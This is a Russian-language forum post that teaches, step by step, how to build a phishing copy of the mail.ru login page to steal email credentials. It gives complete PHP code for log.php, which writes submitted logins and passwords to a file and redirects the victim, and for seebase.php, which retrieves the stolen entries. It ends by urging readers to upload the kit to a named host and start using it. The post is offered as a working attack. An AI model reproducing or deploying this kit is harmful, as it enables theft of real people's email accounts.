раскажем подробно как составляются фейки для взлома мыла через хосты+)
Наш фейк состоит из 4 файлов: index.html , log.php , base.php , seebase.php.
1. index.php:
Сохраняем через браузер страничку авторизации сайта на который мы делаем фейк...например mail.ru:
Открываем сохранённый файл (любым текстовым редактором )и ищем в нём что-то вроде этого:
Код
<form name="MainLogin" action="pro/reg/mail.php" method="post">
Теперь меняем pro/reg/mail.php на log.php
Получится
Код
<form name="MainLogin" action="log.php" method="post">
Далее ищем строки содержащие hidden и удаляем их.
Всё на этом лицо фейка готово.
2.log.php:
log.php будет у нас обрабатывать информацию поступающую из index.html точнее логин и пароль.
Вот листинг log.php:
Код
<?PHP
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль
$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=************************'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
?>
?>
Наш логин Равен имени (name) вот етой строки в index.html
Код
<input type="text" name="login" value="" style="width:50%" tabindex="1" >
Строка может быть и другой, главное name.
А наш пароль равен имени вот етой строки:
Код
<input type="password" name="passwd" value="" style="width:50%" tabindex="2">
Всё лог мы сделали.
3.base.php:
Здесь будут храниться ведённые данные.
Код
<?php echo '<H1>Доступ к базе закрыт!!!</H1>'; exit; ?>
Это надо вписать в base.php и всё, больше ничего.
4.seebase.php:
Это скрипт для просмотра паролей которые хранятся в base.php
Вот листинг:
Код
<head>
<title>Give E-mail</title>
</head>
<body>
<form method="POST">
Login: <input type="text" name="login">
<br>
<input type="submit" value="OK">
</form>
<?php
if (isset($_POST['login']))
if ($_POST['login'] != '')
{
$login = $_POST['login'];
echo $_POST['login'].'<BR>';
$fp = fopen('base.php', 'r');// Имя базы
while (!feof ($fp)) {
$buffer = fgets($fp);
if (strpos($buffer,$login) !== false)
{
echo $buffer.'<BR>';
break;
}
}
fclose($fp);
}
?>
</body>
</html>
Всё...Теперь осталось залить(закачать) фейк на хостинг и начать им пользоваться...)
Хостинг http://www.holm.ru
далее задаем вопросы и обсуждаем то что выше+)